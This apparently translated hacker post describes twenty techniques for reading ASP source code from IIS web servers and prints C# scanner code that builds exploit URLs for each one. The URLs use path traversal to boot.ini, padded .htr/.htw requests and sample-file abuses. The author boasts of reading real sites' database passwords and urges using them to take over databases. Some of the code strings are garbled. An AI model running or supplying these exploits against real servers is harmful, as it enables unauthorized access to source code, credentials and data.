As we all know, the Windows platform has many loopholes, patches are one after another, but it is always not enough to make up for it. I summarized the 20 methods I know about looking at the asp source code, and wrote an application in C# to scan these vulnerabilities. I found that although most of the methods are no longer useful, there are still some missing net fish. :), but in the past two days, I really saw the source code of many websites, including database passwords. If you use access, you can download the library, and if you use SQL Server, you can also use tcp /ip network library is connected to the database and do whatever you want. First, list these 20 methods below:
| . %81 ::DATA %2e %2e%41sp +.htr // longhtr .bak codebrws.asp showcode.asp null.htw qfullhit.htw qsumrhit.htw query.idq search/qfullhit.htw search/qsumrhit.htw iirturnh.htw .htw Translate:f |
The first 10 of the above vulnerabilities are directly added to the asp file, such as %81 is xxx.asp%81. The latter are all implemented through the examples or system vulnerabilities that come with IIS. The most special thing is the translate The :f method is not available directly through the browser. You must establish a socket connection of tcp/ip with the server to send a request. For details, how to use each vulnerability, see below. This is part of my application. You can download everything from my site.
| switch (this.cboMethod.SelectedIndex) { case 0: //Read directly strRequestFile = strServer + strUrl; break; case 5 : //%2e%41sp strRequestFile = strServer + strPath + strFirst + %2e%41sp; break; case 8 ://longhtr strRequestFile = strServer + strUrl + +%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%.htr; break; case 10://codebrws.asp strRequestFile = strServer + /iissamples/exair/howitworks/codebrws.asp?source= + strUrl ; break; case 11://showcode.asp strRequestFile = strServer + /iissamples/exair/howitworks/codebrws.asp?source= + /msadc/../../../boot.ini ; break; case 12 ://null.htw strRequestFile = strServer + /null.htw?CiWebHitsFile= + strUrl + %20&CiRestriction=none&CiHiliteType=Full; break; case 13 ://qfullhit.htw strRequestFile = strServer + /iissamples/issamples/oop/qfullhit.htw? + CiWebHitsFile=/../../boot.ini&CiRestriction=none + &CiHiliteType=Full; break; case 14 ://qsumrhit.htw strRequestFile = strServer + /iissamples/issamples/oop/qsumrhit.htw? + CiWebHitsFile=/../../boot.ini&CiRestriction=none + &CiHiliteType=Full; break; case 15 ://query.idq strRequestFile = strServer + /query.idq?CiTemplate=/../../boot.ini + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%.htx; break; case 16: //search/qfullhit.htw strRequestFile = strServer + /iissamples/exair/search/qfullhit.htw? + CiWebHitsFile=/../../boot.ini&CiRestriction=none + &CiHiliteType=Full; break; case 17: // search/qsumrhit.htw strRequestFile = strServer + /iissamples/exair/search/qsumrhit.htw? + CiWebHitsFile=/../../boot.ini&CiRestriction=none + &CiHiliteType=Full; break; case 18: //iirturnh.htw strRequestFile = strServer + /iishelp/iis/misc/iirturnh.htw? + CiWebHitsFile=/../../boot.ini&CiRestriction=none + &CiHiliteType=Full; break; case 19://.htw strRequestFile = strServer + strUrl + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20% + 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 + %20%20%20%20%20%20%20%20%20%20%.htw? + CiWebHitsFile=/../../boot.ini&CiRestriction=none + &CiHiliteType=Full; break; default: strRequestFile = strServer + strUrl + this.cboMethod.Text; } |